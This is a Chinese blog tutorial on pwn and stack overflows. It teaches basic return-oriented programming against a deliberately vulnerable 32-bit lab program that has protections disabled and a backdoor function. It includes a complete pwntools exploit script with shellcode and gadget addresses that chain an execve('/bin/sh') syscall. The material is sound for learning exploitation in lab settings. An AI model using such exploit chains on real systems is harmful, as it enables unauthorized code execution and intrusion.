栈溢出学习(三)之简单ROP

最新推荐文章于 2024-04-12 08:12:30 发布
最新推荐文章于 2024-04-12 08:12:30 发布
阅读量996 收藏 9
点赞数 1
分类专栏: 【pwn】
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35544379/article/details/105030670
版权

前言

栈溢出学习(三),讲述简单ROP实现栈溢出的原理及其实践方法

样例代码

本文使用的代码如下

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * compiled with:
 *  gcc    -O0     -fno-stack-protector    -no-pie     -z execstack      -m32   -g  -o lab0 lab0.c
          优化等级      关闭canary         关闭地址随机化   关闭NX      生成32位程序

 */

void shell()//backdoor
{
        printf("You got it\n");
        system("/bin/sh");
}


void hello(char* name)
{
  char buf[20];
  strcpy(buf,name);
  puts("hello!!!");
  printf("i am  %s ",buf);
}

void main(int argc,char** argv)
{
  setbuf(stdin,NULL);
  setbuf(stdout,NULL);
  char buf[100];
  puts("*****************************************");
  puts("PWN,hello world!");
  gets(buf);
  hello(buf);

}

0x05 ROP

  • 当前环境:未开启优化,关闭canary,关闭地址随机化,32位程序
  • 目标:修改返回地址,让其指向内存中已有的一段指令

原理

这里借用长亭科技对ROP原理的阐述

payload : padding + address of gadget 1 + address of gadget 2 + ......+ address of gadget n

在这样的构造下,被调用函数返回时会跳转执行 gadget 1,执行完毕时 gadget 1 的 RET 指令会将此时的栈顶数据(也就是 gadget 2 的地址)弹出至 eip,程序继续跳转执行 gadget 2,以此类推
在这里插入图片描述
ROP最常见的效果是实现一次系统调用,在Linux系统下对应的是int 0x80中断。执行这条指令之前,我们需要将需要调用的函数的编号存入eax,调用参数按顺序存入ebx,ecx,edx,esi,edi

系统调用编号参考

我们一般要找内存中寻找类似于pop eax;ret的指令,来完成ROP链的拼接,举个例子,如下图。当程序跳转到pop eax;ret的地址时,pop eax将会把栈上的值赋给eax,也就是将图中的param for eax,我们将需要赋予eax的值放到param for eax即可
在这里插入图片描述
因此,ROP攻击中栈的简要示意图如下
在这里插入图片描述

补充:惯用绕过NX保护的套路是,调用mprotect()为栈开启可执行权限,之后执行shellcode

实现

  • 注意:int 0x80调用是从左至右依次传参,与普通函数的由右往左依次传参不同

我们计划调用的函数为sys_execve,查看syscall Reference,发现该参数需要调用5个寄存器
在这里插入图片描述
因此我们需要寻找

pop eax;ret
pop ebx;ret
pop ecx;ret
pop edx;ret
pop esi;ret
address of int 0x80
address of "/bin/sh"
address of "NULL"
address of "0x0b"

1.找各种pop ret,演示eax,其他同理
在这里插入图片描述

2.找address of int 0x80
在这里插入图片描述
3.找address of "/bin/sh"
在这里插入图片描述
4.找address of "NULL"
在这里插入图片描述
5.找address of "0x0b"
在这里插入图片描述

payload

from pwn import *

local = True
debug = True

shellcode = b'\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'
nop = b'\x90' * 12

padding1 = b'a'*32
padding2 = b'b'*4

esiaddr = p32(0xf7def706)

edxaddr = p32(0xf7dd8aae)
nulladdr = p32(0x8048105)

ecxaddr = p32(0xf7f696d5)

ebxaddr = p32(0xf7defbe5)
binshaddr = p32(0xf7f550cf)

eaxaddr = p32(0xf7dfbb5e)
noaddr = p32(0x80481b0)

int80 = p32(0xf7e048a5)

if local:
    io = process('./lab1')
else:
    io = remote(ip,port)


if debug:
    context.log_level = 'debug'

io.recvuntil('world!')

#input()
gdb.attach(io)
input()

payload = padding1 + eaxaddr + noaddr
payload += ebxaddr + binshaddr
payload += ecxaddr + nulladdr
payload += edxaddr + nulladdr
payload += esiaddr + nulladdr
payload += int80


io.sendline(payload)
io.interactive()

结果

在这里插入图片描述

Pz_mstr
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
rop [ 一] 栈溢出简单ROP思路
令则
02-02 3008
ROP ROP即返回导向的编程 我认为就是不断的去思考代码的作用和计算位置,调试中一步步确定下的代码,这样的手段用于在一个已经成型的程序上调试并写出利用代码,是一种攻击技术 这一篇是结合经典文档:《蒸米的一步步学ROP》自己的笔记 排布首先是栈溢出的简述,然后就是按照攻击的思路去划分出的知识框架。 文章目录ROP栈溢出帧:程序运行流程漏洞利用修改ret后门函数ELF中查找函数参数传递32...
ROP的基本原理和实战教学,看这一篇就够了
QL_2023的博客
02-21 2038
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。通过上一篇文章栈溢出漏洞原理详解与利用,我们可以发现栈溢出的控制点是ret处,那么ROP的核心思想就是利用以ret结尾的指令序列把中的应该返回EIP的地址更改成我们需要的值,从而控制程序的执行流程。
ia32中程序调用返回时call.ret.leave的作用和变换的说明
李海锋的博客
12-17 1675
ia32中程序调用和返回时所用到的call、ret、leave个指令的作用和程序变换的说明(包括esp,ebp,eip)
迁移(leave ret)(更适合pwn宝宝体质的迁移~)
Kata_Jhin的博客
05-15 1622
更适合pwn入门新手体质的迁移教程
ROP例子
fa1c4的blog
02-07 421
下面来举一个简单ROP攻击技术的例子 #include<stdio.h> #include<unistd.h> #include<dlfcn.h> void vuln_func(){ char buf[128]; read(STDIN_FILENO, buf, 256); } int main(int argc, char *argv[]){ void *handle = dlopen("libc.so.6", RTLD_NOW | RTLD_
栈溢出基础——ROP1.0的例题
07-13
栈溢出基础——ROP1.0的例题 在网络安全领域,栈溢出是一种常见的漏洞类型,它源于程序处理内存时的错误,可能导致攻击者控制程序执行流程,从而执行恶意代码。本篇将深入探讨栈溢出的基础知识,并通过一个名为...
栈溢出基础知识、栈溢出保护机制、栈溢出利用方法.docx
01-10
### 栈溢出利用方法 尽管有这些保护机制,攻击者仍然有可能找到绕过的方法,如: 1. **Return-Oriented Programming (ROP)**:通过寻找程序中的小段可执行代码(gadgets),拼接成任意指令序列,实现攻击目的...
缓冲区溢出——栈溢出
08-04
1. **返回导向编程(Return-Oriented Programming, ROP)**:攻击者通过栈溢出覆盖返回地址,使其指向一系列短小的指令片段(称为 gadgets),组合起来执行任意代码。 2. **堆pivot**:改变的布局,使得溢出的...
二进制漏洞挖掘-栈溢出-开启NX未开启ASLR1
08-04
二进制漏洞挖掘是安全研究领域的一个重要主题,特别是在栈溢出漏洞的探索中。栈溢出是指程序在处理上的缓冲区时,由于没有正确地检查输入数据的长度,导致数据溢出到上其他区域,特别是覆盖了返回地址。这种漏洞...
栈溢出入门到放弃_19_7_211
08-08
本篇将深入探讨栈溢出种主要利用方式,以及与之相关的系统机制和解决策略。 1. 修改返回地址:栈溢出中最基础的利用方法是修改返回地址,使其指向攻击者预设的指令序列,即shellcode。shellcode是一小段机器码...
PWN基础之构造ROP链(基本ROP
最新发布
qq_53058639的博客
04-12 972
​随着 NX 保护的开启,以往直接向或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是(Return Oriented Programming),其主要思想是在**缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。**所谓 gadgets 就是以 ret结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
CTF-PWN笔记(一)-- 栈溢出 之 基础ROP
CK_0ff的博客
01-09 4391
文章目录linux内存布局原理文件保护机制CanaryNXPIE(ASLR)RELRO简单栈溢出(ret2txt)ret2shellcode 是一种典型的后进先出 (Last in First Out) 的数据结构,其操作主要有压 (push) 与出 (pop) 两种操作,如下图所示(维基百科)。两种操作都操作顶,当然,它也有底。 高级语言在运行时都会被转换为汇编程序,在汇编程序运行过程中,充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间,其中某一部分就是该程序对应的,用于保存
ROP实例分析()--------------------------实例分析
iDevil7的博客
07-13 1407
实例分析源程序如下IDA分析分析过程首先关注mian函数可以看到程序流程设置定时器打印输出Welcometo RCTF\n清空_bss_start数据流读取用户输入到buff(1024字节)中去调用echo函数,参数为buff然后看子函数echo,该子程序流程如下将用户输入的buff逐字节地拷贝到s2(16字节)中,如果遇到\x00截断于是我们找到了漏洞所在处我们要做的工作就是覆盖返回地址并且构造...
rop链攻击实例
dszfzzm的博客
12-13 944
rop32和rop64的个人解题思路,以及一点思考。
栈溢出总结之基础ROP
weixin_45097188的博客
02-28 576
ret2text 原理:ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。 这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。 例子 仅开了NX不可执行保护...
strcpy复制‘\0‘
Think88666的博客
11-18 7405
今天发现了这样一个问题: char *arr = new char[10]; strcpy(arr, "wangzhaaaa"); delete []arr; 执行这段代码将会报错,因为strcpy复制char*时会复制'\0',所有在new 字符数组的时候应该预留'\0'的空间,否则到时候delete的时候会报错!代码改成这样即可 char *arr = new char[11.........
栈溢出漏洞及栈溢出攻击
热门推荐
guilanl的专栏
03-13 1万+
1. 栈溢出的原因 栈溢出(stack-based buffer overflows)算是安全界常见的漏洞。一方面因为程序员的疏忽,使用了 strcpy、sprintf 等不安全的函数,增加了栈溢出漏洞的可能。另一方面,因为上保存了函数的返回地址等信息,因此如果攻击者能任意覆盖上的数据,通常情况下就意味着他能修改程序的执行流程,从而造成更大的破坏。这种攻击方法就是栈溢出攻击(stack
ssm插入数据时候栈溢出_一篇图文彻底搞懂
weixin_39637700的博客
11-22 127
一篇图文彻底搞懂定义 维基百科上对的说明如下示:(stack)又名堆,它是一种运算受限的线性表。限定仅在表尾进行插入和删除操作的线性表。这一端被称为顶,相对地,把另一端称为底。向一个插入新元素又称作进、入或压,它是把新元素放到顶元素的上面,使之成为新的顶元素;从一个删除元素又称作出或退,它是把顶元素删除掉,使其相邻的元素成为新的顶元素简单定义:就是一种只允许在表...
基础以及溢出的最通俗理解~
Zhangyannn的博客
05-24 673
前言 PWN入门这么久,对的概念理解不是特别深刻,容易忘记,有时做题思考时还需要查阅资料回顾。网上基础的教程比较多,也比较杂,为了方便个人理解,所以考虑做一篇对栈溢出的相关理解笔记,帮助自己强化下记忆,方便以后回顾~部分内容来自ctf-wiki 基础知识 是一种LIFO(last in first out)后进先出的数据结构,大学最基本的C语言就有讲过这一点。主要的操作有push(压)和pop(出)两种操作,这两个指令的直接使用是在底层汇编语言中,直接阅读C、C++这类高级语言是看不到这两
栈溢出攻击深度探索:Exploit编写教程
教程详细讲解了从栈溢出到利用Metasploit框架、调试器模块、插件以及各种防御机制的绕过方法。此外,还包括Unicode exploit的编写、Shellcode的基础和高级应用,以及如何利用Return Oriented Programming (ROP) 绕过...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值